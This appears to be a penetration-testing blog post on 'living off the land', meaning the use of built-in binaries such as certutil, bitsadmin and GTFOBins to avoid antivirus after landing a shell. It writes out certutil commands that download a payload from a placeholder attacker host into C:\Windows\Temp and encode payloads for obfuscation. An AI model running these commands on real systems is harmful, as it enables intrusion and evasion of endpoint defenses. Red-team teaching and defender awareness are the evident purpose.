Living Off the Land: Winning Without Dropping Tools
You finally land a shell after that flawless buffer overflow or SQL injection. Heart racing, you type whoami… and then it happens.You try to upload your trusty reverse shell or enumeration script AV instantly kills it. Or the upload fails because the box has no internet outbound, or AppLocker is laughing at your attempts. Or worse: you only have a limited shell with no write permissions in obvious spots.“You get a shell… AV kills your payload… what now?”
Don’t panic, Live off the land.
Living Off the Land (LOTL) means using the tools and binaries already present on the target system instead of dropping your own custom payloads. It’s stealthy, it’s resilient, and it’s how real adversaries operate when things don’t go according to the upload to execute playbook. On Windows, these are called LOLBins (Living Off the Land Binaries). On Linux, the equivalent is often referenced via GTFOBins a curated list of binaries that can be abused for file transfer, execution, privilege escalation for example.
MITRE ATT&CK – Concept of LOLBins / GTFOBins
Core Windows LOLBins
certutil
bitsadmin
wmic
PowerShell
Linux GTFOBins
bash
find
awk
sudo abuse
Core Windows LOLBins: A core LOLbin would be certutil.exe Aka “The Swiss Army Knife Downloader”. Certutil is meant for certificate management, but it doubles as a file downloader and encoder/decoder. File transfer (download): cmd: certutil.exe -urlcache -split -f http://your-attacker-ip/payload.exe C:\Windows\Temp\p.exe Alternative (sometimes less monitored): cmd: certutil.exe -verifyctl -f http://your-attacker-ip/payload.exe C:\Windows\Temp\p.exe
You can also use it to encode/decode files (great for obfuscation): cmd – certutil -encode payload.exe encoded.b64certutil -decode encoded.b64 payload.exe Pro tip: Run this from a writable directory like %TEMP% or C:\Windows\Temp.
